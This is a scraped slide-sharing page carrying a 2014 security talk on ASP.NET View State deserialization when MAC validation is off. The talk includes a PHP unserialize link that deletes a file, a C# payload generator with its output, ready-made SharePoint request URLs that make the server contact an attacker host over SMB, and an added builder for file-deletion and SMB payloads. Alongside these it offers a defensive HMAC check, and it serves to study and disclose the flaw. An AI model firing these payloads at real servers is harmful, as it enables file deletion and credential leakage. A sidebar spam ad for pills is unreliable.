iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itCyber Security Alliance
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksCyber Security Alliance
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 

Plus de Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 

Dernier

Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 

Dernier (20)

Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 

Asfws 2014 slides why .net needs ma-cs and other serial(-ization) tales_v2.0

• 6. Once upon a time…
September 2012,
•during a standard ASP.NET web application assessment…
<body>
<form name="aspnetForm" method="post" action="[…]" id="aspnetForm">
<div>
<input type="hidden" […] value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/>
<input type="hidden" name="__VSTATE" id="__VSTATE" value="[LONG_BASE64_STRING]" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" />
</div>
• 8. Once upon a time…
protected override object LoadPageStateFromPersistenceMedium()
{
    string viewState = Request.Form["__VSTATE"];
    byte[] bytes = Convert.FromBase64String(viewState);
    if (Helper.obterFlagCompressViewState())
        bytes = Compressor.Decompress(bytes);
    LosFormatter formatter = new LosFormatter();   // default constructor: no MAC key, no validation
    return formatter.Deserialize(Convert.ToBase64String(bytes));
}

protected override void SavePageStateToPersistenceMedium(object viewState)
{
    LosFormatter formatter = new LosFormatter();
    StringWriter writer = new StringWriter();
    formatter.Serialize(writer, viewState);
    string viewStateString = writer.ToString();
    byte[] bytes = Convert.FromBase64String(viewStateString);
    if (Helper.obterFlagCompressViewState())
        bytes = Compressor.Compress(bytes);
    x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes));   // emitted without any integrity check
}
• 10. Once upon a time…
We have
•A custom implementation of the __VIEWSTATE field
•Its value is stored compressed within __VSTATE
•It uses the default LosFormatter object constructor
•No Machine Authentication (sic) Code (MAC) is used
•The custom view state (__VSTATE) sent to the client is therefore not integrity-protected
–Despite the fact we serialize / deserialize objects…
The same applies to regular ASP.NET pages
•If property EnableViewStateMac is disabled (enabled by default)
• 12. Tales “Why does .NET need MACs”
A View State contains
•2 bytes of header data (ASP.NET 1.1 versus 2.0+)
•A tree of serialized objects (View State Bag & serialized ASP.NET controls of the page)
•A (H)MAC ensuring integrity (if configured so – default: enabled)
A View State
•Can be encrypted
•Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields)
•Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property)

• 13. Tales “Why does .NET need MACs”
View State handling and lifecycle
[Diagram: request from the client comes in → Deserialize → ASP.NET deserializes the View State and copies the values back into the controls → Serialize → response is sent to the client]
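What the missing integrity check of slide 10 looks like when it is present, as an added example that is not part of the deck: a Python model of the slide-12 layout (FF 01 header, serialized body, HMAC trailer) with a verify-before-deserialize load step, and the Page.ViewStateUserKey idea mixed into the MAC input so a blob captured from one user does not verify for another. The validation key, the user keys and the Pair("hello", null) body are constructed for this example; the unsigned FileInfo payload is the one printed later in the deck. ASP.NET derives its key and hashes in a page-specific modifier in ways this model does not reproduce, so treat it as the pattern, not the framework's exact algorithm.

```python
import base64
import hashlib
import hmac

# Layout from slide 12: two header bytes (FF 01), the serialized object tree,
# then the MAC computed over everything before it. HMAC-SHA256 trailer here.
HEADER = b"\xff\x01"
MAC_LEN = hashlib.sha256().digest_size

# Constructed body: ObjectStateFormatter stream for Pair("hello", null):
# Token_Pair (0x0F), Token_String (0x05) + 7-bit length + UTF-8, Token_Null (0x64).
# Hand-assembled for this example, not captured from a server.
SAMPLE_BODY = HEADER + b"\x0f\x05\x05hello\x64"

# Assumed server secret, standing in for <machineKey validationKey="...">.
VALIDATION_KEY = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)

# The unsigned LosFormatter-serialized FileInfo from the deck's PoC: no trailer at all.
UNSIGNED_FILEINFO_FIELD = (
    "/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRo"
    "CEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs="
)


def protect(body: bytes, key: bytes, user_key: bytes = b"") -> str:
    """Serialize step: append HMAC(key, body || user_key) and Base64 the result.
    user_key models Page.ViewStateUserKey: it is part of the MAC input, so the
    same body yields a different trailer per user/session."""
    if not body.startswith(HEADER):
        raise ValueError("body must start with the FF 01 ObjectStateFormatter header")
    mac = hmac.new(key, body + user_key, hashlib.sha256).digest()
    return base64.b64encode(body + mac).decode("ascii")


def unprotect(field: str, key: bytes, user_key: bytes = b"") -> bytes:
    """Deserialize step: verify the trailer BEFORE any object is reconstructed.
    Returns the body a formatter may now consume; raises on any mismatch."""
    raw = base64.b64decode(field)
    if len(raw) < len(HEADER) + MAC_LEN or not raw.startswith(HEADER):
        raise ValueError("malformed or unsigned view state")
    body, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(key, body + user_key, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):  # constant-time comparison
        raise ValueError("view state MAC validation failed")
    return body


def tamper(field: str, offset: int) -> str:
    """Flip one bit of the decoded field at `offset` (an attacker editing the body)."""
    raw = bytearray(base64.b64decode(field))
    raw[offset] ^= 0x01
    return base64.b64encode(bytes(raw)).decode("ascii")


def accepted(field: str, key: bytes, user_key: bytes = b"") -> bool:
    """True if the server would hand this field to the deserializer."""
    try:
        unprotect(field, key, user_key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    signed = protect(SAMPLE_BODY, VALIDATION_KEY, user_key=b"session-4711")
    print("signed field      :", signed)
    print("same user, intact :", accepted(signed, VALIDATION_KEY, b"session-4711"))
    print("body byte edited  :", accepted(tamper(signed, 5), VALIDATION_KEY, b"session-4711"))
    print("replayed by other :", accepted(signed, VALIDATION_KEY, b"session-4712"))
    print("unsigned FileInfo :", accepted(UNSIGNED_FILEINFO_FIELD, VALIDATION_KEY))
```

The order of operations is the whole point: the MAC is checked on raw bytes, and only a verified body reaches the formatter. With the default LosFormatter constructor of slide 8 there is no trailer to check, so the FileInfo payload decodes cleanly and its constructor runs; with the check in place it is rejected as "unsigned" before any type is instantiated.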
• 14. Tales “Why does .NET need MACs”
State of the art of hacking View States back then:
Trustwave's SpiderLabs Security Advisory TWSL2010-001:
Multiplatform View State Tampering Vulnerabilities
Published: 2010-02-08
Version: 1.1
SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported.
Credit: David Byrne of Trustwave's SpiderLabs
The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state.

• 16. Tales “Why does .NET need MACs”
Inappropriate Microsoft advice back then (Trustwave):
• 17. Tales “Why does .NET need MACs”
State of the art of exploiting ASP.NET View State fields without MACs:
•Abuse them for XSS
•You must have an existing control on the page accepting HTML to inject your payload
Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language
•Implemented in their “Deface” tool
•This attack was presented in MISC magazine #69

• 18. Tales “Why does .NET need MACs”
Back to September 2012: so ASP.NET unprotected View State fields can be misused
•But “only” for XSS when a few pre-conditions are met
•And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010)
Some pages in e.g. SharePoint do not enforce a MAC on the View State
•View State on these pages is empty, so you can’t misuse them for XSS
• 20. “Serialization” tales
Serialization is known to be an issue in web apps
•Potentially user defined content gets deserialized on the server
•Depends on the technology and the application’s code
•Tool “Deface” targets Apache MyFaces 1.2.8 applications
Let’s see a PHP example:

• 21. “Serialization” tales
class Example1
{
    public $cache_file;

    function __construct()
    {
        // some PHP code...
    }

    function __destruct()
    {
        $file = "/var/www/cache/tmp/{$this->cache_file}";
        if (file_exists($file)) @unlink($file);
    }
}

// some PHP code...
$user_data = unserialize($_GET['data']);
// some PHP code...

• 22. “Serialization” tales
Flaw can be exploited with the following link
•http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}
When receiving this request, the server
•Takes GET parameter “data” and “unserialize”s it
•Instantiates an object of class “Example1”
•Assigns value “../../index.php” to property “cache_file”
•When the page lifetime is over, method “__destruct()” of object “Example1” is called, which deletes the file
Can the same be done with .NET?
• 24. “Serialization” tales
Great research of James Forshaw (Context)
Studying (and exploiting) .NET serialization via
•IFormatter
•XML Serialization
•WCF Data Contracts
•JSON
But not a word about serialization of
•View State field
•LosFormatter object (limited object serialization)

• 25. “Serialization” tales
Awesomeness of James Forshaw’s research
•Standard .NET object TempFileCollection deletes files in destructor
[Serializable]
public class TempFileCollection
{
    private Hashtable files;   // Deserialized list of files
    // Other stuff...
    ~TempFileCollection()
    {
        foreach (string file in files.Keys)
        {
            File.Delete(file);   // Makes sure to delete them when
                                 // the object is destroyed!
        }
    }
}

• 26. “Serialization” tales
Awesomeness of James Forshaw’s research
•Standard .NET object FileInfo triggers SMB requests
[Serializable]
public class FileInfo
{
    private string FullPath;
    protected FileInfo(SerializationInfo info, StreamingContext context)
    {
        // Ensures path is canonical
        FullPath = NormalizePath(info.GetString("FullPath"));
    }
}

string NormalizePath(string path)
{
    string[] parts = path.Split('\\');
    foreach (string part in parts)
    {
        currPath += "\\" + part;
        if (part[0] == '~')          // If potential short path,
        {                            // call Windows API
            GetLongPathName(currPath);
        }
    }
}
  • 28. When the stories come together – My tale What if I can combine the fact I now have •A View State field without integrity protection (resp. MAC) •Known .NET objects having interesting (de)serialization actions If possible, I would be able to e.g. •Delete a file on the server •Get the server to initiate a SMB request to e.g. the attacker’s machine Can I apply it? Can it be done within the few hours left onsite? 28
  • 29. When the stories come together – My tale using System; using System.IO; using System.Text; using System.Web.UI; // created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012 public class ExploitViewstate { // Caution: both files must be the same length! static String bugusFile = @"ATTACKER~testtext.txt"; static String dummyFile = @"c:testCompasstestVS.txt"; public static void Main(string[] args) { String validViewstate = GenerateValidViewstate(); Console.WriteLine("Valid viewstate: {0}", validViewstate); } private static String GenerateValidViewstate() { FileInfo fi = new FileInfo(dummyFile); LosFormatter los = new LosFormatter(); using (StringWriter sw = new StringWriter()) { los.Serialize(sw, fi); return sw.ToString(); } } } 29
• 30. When the stories come together – My tale

    C:\>set csc=c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    C:\>%csc% exploitViewstate.cs && exploitViewstate.exe
    Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927
    for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727
    Copyright (C) Microsoft Corporation 2001-2005. All rights reserved.

    Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs=

For the PoC, we need to change the file in the above Base64 string from
•c:\testCompass\testVS.txt to
•\\ATTACKER\~test\text.txt
Decoded, the stream is the ObjectStateFormatter header (FF 01), a “binary serialized” token and a BinaryFormatter record for System.IO.FileInfo with its two members OriginalPath and FullPath; each string and the whole blob carry a length prefix, hence the equal-length constraint.
• 31. When the stories come together – My tale
On an unpatched SharePoint, just send the following request:
•http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d
The two path strings in this payload decode to \\db\~testxxxx\testVS.txt, 25 characters like the dummy path, so only the bytes and not the length prefixes had to change. Note that the View State travels in the query string of a plain GET; as the log on the next slide shows, that is enough for the page to process it.
• 33. When the stories come together – My tale
In the SharePoint logs:

    09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium
    Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d))
    […]
    09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected
    System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'.
    at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5-6190-481e-8b21-c2cb5d04222b

The InvalidCastException is thrown only after LosFormatter has fully deserialized the FileInfo, i.e. after its deserialization constructor has already tried to reach the host named in the path: the side effect does not depend on the cast succeeding, and the 19 seconds between the two entries are consistent with the worker process waiting on that network request.
• 34. When the stories come together – My tale
Demo! When the View State MAC is disabled, you can
•Delete a file on the server (via object TempFileCollection)
•Get the server to initiate an SMB request to e.g. the attacker’s machine (via object FileInfo)
•I wasn’t able to get a generic remote code execution (so far)
–Highly dependent on the application / content of the server’s GAC
–But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit…
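As an added example (not the slides’ code, nor a Compass Security tool), the following C# generalises the PoC generator of slides 29/30 to the two gadgets listed above. Instead of hand-editing Base64, it rewrites the path inside the serialized stream and re-encodes the length prefixes, so the target path no longer has to match the dummy’s length; it also builds the TempFileCollection deletion payload and reproduces that gadget locally against a throw-away temp file. The host name ATTACKER, the target path under App_Data and the dummy path are placeholders, and the layout comments describe the stream as decoded from the PoC on slide 30.

```csharp
// Added example: payload builder for the FileInfo (SMB) and TempFileCollection (delete)
// gadgets, plus a local reproduction of the delete gadget. Requires the .NET Framework
// (LosFormatter lives in System.Web.dll, which the Framework csc.rsp references by default).
using System;
using System.CodeDom.Compiler;
using System.IO;
using System.Runtime.CompilerServices;
using System.Text;
using System.Web.UI;

public static class ViewStatePayloads
{
    // Dummy local path used at generation time (need not exist); the real target is
    // patched into the stream afterwards, like the hand-edited Base64 on slide 30.
    const string DummyPath = @"C:\Windows\Temp\placeholder.txt";

    // FileInfo gadget: on deserialization FullPath is canonicalised, and a "~" component
    // under a UNC prefix makes the server call GetLongPathName, i.e. talk SMB to that host.
    public static string FileInfoSmbPayload(string uncPath)
    {
        return RewritePath(Serialize(new FileInfo(DummyPath)), DummyPath, uncPath);
    }

    // TempFileCollection gadget: files added with keepFile=false are deleted by the
    // finalizer, so the deletion happens whenever the GC collects the deserialized object.
    public static string TempFileCollectionDeletePayload(string pathOnServer)
    {
        TempFileCollection tfc = new TempFileCollection();
        tfc.AddFile(pathOnServer, false);      // only records the name, touches no file
        return Serialize(tfc);
    }

    // LosFormatter() without a key writes exactly what enableViewStateMac="false" accepts.
    static string Serialize(object graph)
    {
        using (StringWriter sw = new StringWriter())
        {
            new LosFormatter().Serialize(sw, graph);
            return sw.ToString();
        }
    }

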